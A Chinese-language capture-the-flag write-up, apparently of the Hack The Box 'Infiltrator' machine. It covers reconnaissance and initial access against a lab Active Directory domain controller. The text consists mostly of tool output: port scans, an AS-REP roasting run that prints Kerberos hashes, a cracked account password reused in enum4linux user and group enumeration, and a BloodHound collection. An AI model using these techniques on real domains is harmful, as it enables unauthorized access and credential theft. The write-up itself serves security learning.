这个难度无愧于这个 INSANE,这篇 90%都是复现,最后的 PE 部分还每太整明白,后面如果有机会的话补充一下,并且总结下思路。
我这个是一点域渗透的基础也没有的学习,所以有些地方理解可能有问题,请大家一定要指出方便修改!!!
信息搜集
1 2 3 4 5 6 7 8 9 10 11 12 13 14
start infoscan 10.10.11.31:80 open 10.10.11.31:88 open 10.10.11.31:445 open 10.10.11.31:139 open 10.10.11.31:135 open [*] alive ports len is: 5 start vulscan [*] WebTitle http://10.10.11.31 code:200 len:31235 title:Infiltrator.htb [*] NetInfo [*]10.10.11.31 [->]dc01 [->]10.10.11.31
nmap -sSVC infiltrator.htb Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-0515:14 CST Nmap scan report for infiltrator.htb (10.10.11.31) Host is up (0.073s latency). Not shown: 987 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-title: Infiltrator.htb 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-09-0507:04:14Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 |_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time. 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 |_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time. 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: infiltrator.htb0., Site: Default-First-Site-Name) |_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time. | ssl-cert: Subject: | Subject Alternative Name: DNS:dc01.infiltrator.htb, DNS:infiltrator.htb, DNS:INFILTRATOR | Not valid before: 2024-08-04T18:48:15 |_Not valid after: 2099-07-17T18:48:15 3389/tcp open ms-wbt-server Microsoft Terminal Services |_ssl-date: 2024-09-05T07:05:34+00:00; -10m05s from scanner time. | ssl-cert: Subject: commonName=dc01.infiltrator.htb | Not valid before: 2024-07-30T13:20:17 |_Not valid after: 2025-01-29T13:20:17 | rdp-ntlm-info: | Target_Name: INFILTRATOR | NetBIOS_Domain_Name: INFILTRATOR | NetBIOS_Computer_Name: DC01 | DNS_Domain_Name: infiltrator.htb | DNS_Computer_Name: dc01.infiltrator.htb | DNS_Tree_Name: infiltrator.htb | Product_Version: 10.0.17763 |_ System_Time: 2024-09-05T07:04:55+00:00 Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
/usr/local/bin/GetNPUsers.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html __import__('pkg_resources').run_script('impacket==0.12.0', 'GetNPUsers.py') Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User D.Anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User O.Martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User K.Turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User A.Walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User M.Harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$L.Clark@infiltrator.htb@INFILTRATOR.HTB:d2b6127bdd253a8a6ea3a0bb86a3c816$4e7096e0a6ba8409033c25edbee6187609209b76a6c7beef2f398abaca8c66f74cb0cf05523b3f2cd97e9e01774ddde4d2aeb62289f7ca692f5c69000b872ee270056573b8dfb37508c8821243f5043d5139770dfbb276276078f55fc8412f70103cf0877aa5df36da60ce44d09c1ea5b6b898f14cc1bac2952061616359b02d02209730df4f6a995e75c7e17955983c13d53989855cffe18a641007c6378e622c8bdb6c1b5f6b597a2af6726aa14f631fdd79d8bf70fc989c09ad9b6ccdbc4baf6313414a863661a5546cb3c0308044aca3b2426d8af6f0b9ffbd2b875c372339755eb5086ff54ca56870e7ce0533587317 [-] User E.Rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User d.anderson@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User o.martinez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User k.turner@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User a.walker@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User m.harris@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$l.clark@infiltrator.htb@INFILTRATOR.HTB:29a707b0d8f8b993355bcfa7a6b9bf70$b229a3fd6ff41bc50682fed30a35e19bc4b7a013c3398873cbe184fb5b6f155a1a9fb725ae126572532fbde8486aaa9a9063fd3589441f5406037c4cd20ac94e9cb094dfdc9cd45b770f39272408b10d2cae3eb8d70cc1b47f612d0537805b4b4d48504cd5eab872059ebcf33cd5d7bcd94bc3bdb614de1b9cab4a6842fc974b74c4c997913d4764f8e1cbb11211d5d6f9d3a1d8fbf317e0979d44ea756974aa09fcbbc925b0926d0194c99c948f418ff65538cdfef8f7ea1d884849b1f4a280fbb9fdf2e35d3e9343b15f675e7ebc6f849e73c0e4d5131b10023d63b247cac1ba0ebff9065737f49ba1b6598fe818c4f15b [-] User e.rodriguez@infiltrator.htb doesn't have UF_DONT_REQUIRE_PREAUTH set
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 516:20:572024
=========================================( Target Information )========================================= Target ........... 10.10.11.31 RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... 'WAT?watismypass!' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.11.31 )============================ [E] Can't find workgroup/domain ====================================( Session Check on 10.10.11.31 )==================================== [E] Server doesn't allow session using username '', password 'WAT?watismypass!'. Aborting remainder of tests. ┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD] └─# enum4linux -U -p 'WAT?watismypass!' infiltrator.htb Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 516:21:582024
=========================================( Target Information )========================================= Target ........... infiltrator.htb RID Range ........ 500-550,1000-1050 Username ......... '' Password ......... 'WAT?watismypass!' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on infiltrator.htb )========================== [E] Can't find workgroup/domain ==================================( Session Check on infiltrator.htb )================================== [E] Server doesn't allow session using username '', password 'WAT?watismypass!'. Aborting remainder of tests. ┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD] └─# enum4linux -a -u /home/kali/桌面/weapon/Infiltrator/email.txt -p 'WAT?watismypass!' infiltrator.htb Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 516:26:392024
=========================================( Target Information )========================================= Target ........... infiltrator.htb RID Range ........ 500-550,1000-1050 Username ......... '/home/kali/桌面/weapon/Infiltrator/email.txt' Password ......... 'WAT?watismypass!' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on infiltrator.htb )========================== [E] Can't find workgroup/domain ==============================( Nbtstat Information for infiltrator.htb )============================== Looking up status of 10.10.11.31 No reply from 10.10.11.31 ==================================( Session Check on infiltrator.htb )================================== [E] Server doesn't allow session using username '/home/kali/桌面/weapon/Infiltrator/email.txt', password 'WAT?watismypass!'. Aborting remainder of tests. ┌──(root㉿kali)-[/home/…/桌面/weapon/windows/AD] └─# enum4linux -a -u 'l.clark' -p 'WAT?watismypass!' infiltrator.htb Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Thu Sep 516:30:092024
=========================================( Target Information )========================================= Target ........... infiltrator.htb RID Range ........ 500-550,1000-1050 Username ......... 'l.clark' Password ......... 'WAT?watismypass!' Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
==========================( Enumerating Workgroup/Domain on infiltrator.htb )========================== [E] Can't find workgroup/domain ==============================( Nbtstat Information for infiltrator.htb )============================== Looking up status of 10.10.11.31 No reply from 10.10.11.31 ==================================( Session Check on infiltrator.htb )================================== [+] Server infiltrator.htb allows sessions using username 'l.clark', password 'WAT?watismypass!' ===============================( Getting domain SID for infiltrator.htb )=============================== Domain Name: INFILTRATOR Domain Sid: S-1-5-21-2606098828-3734741516-3625406802 [+] Host is part of a domain (not a workgroup) =================================( OS information on infiltrator.htb )================================= [E] Can't get OS info with smbclient [+] Got OS info for infiltrator.htb from srvinfo: INFILTRATOR.HTBWk Sv PDC Tim NT platform_id : 500 os version : 10.0 server type : 0x80102b
================================( Share Enumeration on infiltrator.htb )================================ do_connect: Connection to infiltrator.htb failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Sharename Type Comment -------------------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share SYSVOL Disk Logon server share Reconnecting with SMB1 for workgroup listing. Unable to connect with SMB1 -- no workgroup available
[+] Getting domain group memberships: Group: 'Domain Admins' (RID: 512) has member: INFILTRATOR\Administrator Group: 'Schema Admins' (RID: 518) has member: INFILTRATOR\Administrator Group: 'Infiltrator_QA' (RID: 1114) has member: INFILTRATOR\K.turner Group: 'Developers' (RID: 1112) has member: INFILTRATOR\M.harris Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\Administrator Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\krbtgt Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\D.anderson Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\L.clark Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\M.harris Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\O.martinez Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\A.walker Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\K.turner Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\E.rodriguez Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\winrm_svc Group: 'Domain Users' (RID: 513) has member: INFILTRATOR\lan_managment Group: 'Marketing_Team' (RID: 1115) has member: INFILTRATOR\D.anderson Group: 'Marketing_Team' (RID: 1115) has member: INFILTRATOR\L.clark Group: 'Domain Computers' (RID: 515) has member: INFILTRATOR\infiltrator_svc$ Group: 'Protected Users' (RID: 525) has member: INFILTRATOR\D.anderson Group: 'Protected Users' (RID: 525) has member: INFILTRATOR\M.harris Group: 'Enterprise Admins' (RID: 519) has member: INFILTRATOR\Administrator Group: 'Chiefs Marketing' (RID: 1111) has member: INFILTRATOR\O.martinez Group: 'Chiefs Marketing' (RID: 1111) has member: INFILTRATOR\A.walker Group: 'Domain Guests' (RID: 514) has member: INFILTRATOR\Guest Group: 'Group Policy Creator Owners' (RID: 520) has member: INFILTRATOR\Administrator Group: 'Domain Controllers' (RID: 516) has member: INFILTRATOR\DC01$ Group: 'Service_Management' (RID: 1116) has member: INFILTRATOR\winrm_svc Group: 'Digital_Influencers' (RID: 1113) has member: INFILTRATOR\E.rodriguez
=================( Users on infiltrator.htb via RID cycling (RIDS: 500-550,1000-1050) )================= [I] Found new SID: S-1-5-21-2606098828-3734741516-3625406802
[I] Found new SID: S-1-5-21-2606098828-3734741516-3625406802
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-32
[I] Found new SID: S-1-5-21-2606098828-3734741516-3625406802
[I] Found new SID: S-1-5-21-2606098828-3734741516-3625406802
==============================( Getting printer info for infiltrator.htb )============================== do_cmd: Could not initialise spoolss. Error was NT_STATUS_OBJECT_NAME_NOT_FOUND
bloodhound-python-c ALL -u l.clark -p'WAT?watismypass!'-d infiltrator.htb -ns10.10.11.31 INFO: Found AD domain: infiltrator.htb INFO: Getting TGT for user INFO: Connecting to LDAP server: dc01.infiltrator.htb INFO: Kerberos auth to LDAP failed, trying NTLM INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: dc01.infiltrator.htb INFO: Kerberos auth to LDAP failed, trying NTLM INFO: Found 14 users INFO: Found 58 groups INFO: Found 2 gpos INFO: Found 2 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: dc01.infiltrator.htb WARNING: Failed to get service ticket for dc01.infiltrator.htb, falling back to NTLM auth CRITICAL: CCache file is not found. Skipping... WARNING: DCE/RPC connection failed: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great) WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out. INFO: Done in01M 27S